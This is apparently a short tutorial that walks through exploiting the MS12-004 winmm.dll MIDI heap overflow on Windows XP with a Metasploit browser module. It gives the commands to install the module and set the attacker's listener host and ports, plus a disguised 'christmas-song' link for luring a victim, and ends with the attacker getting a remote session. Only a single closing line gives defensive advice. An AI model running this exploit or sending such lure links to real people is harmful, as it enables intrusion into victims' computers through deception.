Type : Tutorial
Level : Medium
Attacker O.S : Backtrack 5 R1
Victim O.S : Windows XP SP3
Vulnerable Application : Windows Multimedia Library (winmm.dll)
Exploit Credits : Shane Garrett, Juan Vazquez, Sinn3r
This module exploits a heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files. Remote code execution can be achieved by using Windows Media Player's ActiveX control.
Exploitation is done by supplying a specially crafted MIDI file with specific events, causing the offset calculation being higher than how much is available on the heap (0x400 allocated by WINMM!winmmAlloc), and then allowing us to either "inc al" or "dec al" a byte. This can be used to corrupt an array (CImplAry) we setup, and force the browser to confuse types from tagVARIANT objects, which leverages remote code execution under the context of the user.
At this time, for IE 8 target, JRE (Java Runtime Environment) is required to bypass DEP (Data Execution Prevention).
Note: Based on our testing, the vulnerability does not seem to trigger when the victim machine is operated via rdesktop.
1. Metasploit Framework (Windows/Linux)
2. ms12_004_midi.rb exploit (download link )
Attacker IP Address : 192.168.1.7
Victim IP Address : 192.168.1.6
1. Download the exploit above and then copy to destination folder by using following command :
cp ms12_004_midi.rb /pentest/exploits/framework/modules/exploits/windows/browser/
2. Run your metasploit framework using msfconsole command and then use the exploit you've just added on step 1.
3. On the next step you can view available switch by running show options command. In this example below only important switch to make exploit running without problem.
set srvhost 192.168.1.7 --> attacker server host(attacker ip address) set srvport 80 --> set local port that open to receive connection from victim set uripath christmas-song --> social engineering links set lhost 192.168.1.7 --> set lhost ip address to receive payload set lport 443 --> set local port to receive payload connection from victim exploit --> run the exploit http://192.168.1.7/christmas-song --> link to send to victim
4. When victim open malicious link, our backtrack console shows active session and we can get into their computer 🙂
1. Always update your windows. If you're using Win XP, you can migrate to windows 7.
Hope you enjoyed 🙂